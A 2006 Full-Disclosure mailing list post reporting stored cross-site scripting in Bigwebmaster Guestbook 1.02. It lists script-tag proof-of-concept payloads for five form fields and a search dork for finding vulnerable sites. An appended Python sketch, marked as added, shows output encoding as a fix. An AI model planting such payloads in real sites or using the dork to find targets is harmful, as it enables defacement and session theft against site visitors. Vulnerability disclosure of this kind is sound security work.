[Full-disclosure] bigwebmaster guestbook multiple XSS
drfrancky at securax.org
Thu May 4 17:02:11 BST 2006
Bigwebmaster Guestbook version 1.02 and down
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.
mail: xss at example.com <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>
intitle:Big Webmaster Guestbook
I DON'T CARE
Javor Ninov aka DrFrancky
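
A mitigation sketch for the issue reported above, as an added example that is not part of the original post or the vendor's code: every stored field is HTML-encoded when the entry is displayed, and the site field becomes a link only if it is a clean http(s) URL. The function names `safe_url` and `render_entry` and the output markup are assumptions; only the field names and sample values come from the post.

```python
import html
from urllib.parse import urlsplit

# Field names come from the post; the script's real storage/template format is not shown there.
TEXT_FIELDS = ("mail", "city", "state", "country")

def safe_url(value):
    """Hypothetical helper: return value only if it is a plain http(s) URL, else None."""
    value = value.strip()
    if any(c.isspace() or not c.isprintable() or c in "<>\"'" for c in value):
        return None
    try:
        parts = urlsplit(value)
    except ValueError:
        return None
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return value

def render_entry(entry):
    """Hypothetical renderer: HTML-encode every stored field at output time."""
    rows = []
    for name in TEXT_FIELDS:
        rows.append("<dt>%s</dt><dd>%s</dd>" % (name, html.escape(entry.get(name, ""), quote=True)))
    site = entry.get("site", "")
    url = safe_url(site)
    if url is None:
        # Not a clean http(s) URL: show it as inert text, never as a link.
        rows.append("<dt>site</dt><dd>%s</dd>" % html.escape(site, quote=True))
    else:
        esc = html.escape(url, quote=True)
        rows.append('<dt>site</dt><dd><a href="%s" rel="nofollow noopener">%s</a></dd>' % (esc, esc))
    return "<dl>\n" + "\n".join(rows) + "\n</dl>"

# Constructed sample entry reusing the field values listed in the post.
SAMPLE = {
    "mail": "xss at example.com <script>alert('XSS in mail');</script>",
    "site": "http://www.example.com/ <script>alert('XSS in site');</script>",
    "city": "<script>alert('XSS in city');</script>",
    "state": "<script>alert('XSS in state');</script>",
    "country": "<script>alert('XSS in country');</script>",
}

if __name__ == "__main__":
    print(render_entry(SAMPLE))
```

Encoding at display time also covers entries that were stored before any input filtering was added.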